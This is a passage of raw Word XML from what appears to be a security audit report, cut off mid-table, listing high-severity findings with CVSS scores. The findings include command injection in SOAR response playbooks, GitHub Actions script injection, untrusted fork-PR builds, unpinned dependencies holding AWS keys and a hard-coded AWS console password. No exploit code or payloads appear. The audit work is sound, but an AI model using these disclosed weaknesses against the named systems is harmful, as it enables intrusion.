            <w:tcW w:w="5267" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>All 28 GitHub Action references use mutable major tags; third-party actions run with PAT and AWS keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1645" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5267" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Splunk apps, attack data and container images downloaded without integrity verification from mutable locations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1645" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5267" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dependency-update automation does not cover pip or docker ecosystems; no SBOM produced with releases</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. Complete Findings Catalogue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>All 111 unique findings in severity order. Detailed write-ups are in Section 4; framework mappings are in Section 10.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="864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900"/>
        <w:gridCol w:w="4320"/>
        <w:gridCol w:w="1147"/>
        <w:gridCol w:w="900"/>
        <w:gridCol w:w="1373"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Area</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unpinned pip install in a scheduled job holding long-lived AWS keys that writes the shared app-binaries bucket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CrowdStrike RTR command-argument injection and path traversal via raw path/pid inputs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PowerShell command injection via unquoted filepath in internal_host_winrm_log4j_respond</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CrowdStrike FQL filter injection via playbook_input:device (10 playbooks)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Script injection via github.head_ref interpolated into run: steps (unit-testing workflow)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI/CD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Untrusted fork-PR code built and executed on a large runner; PR-built artifacts uploaded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI/CD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Destructive response actions (account disable/enable, quarantine, kill, delete, block, global prevent IOC) with no approval gate or allow-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>OS command injection via ip_or_hostname in SSH investigate playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>OS command injection via filepath in internal_host_ssh_log4j_respond</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Command injection and arbitrary file deletion via filePath in delete_detected_files (no approval gate)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Hard-coded AWS IAM console password applied to every re-enabled user (public repository)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>7.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
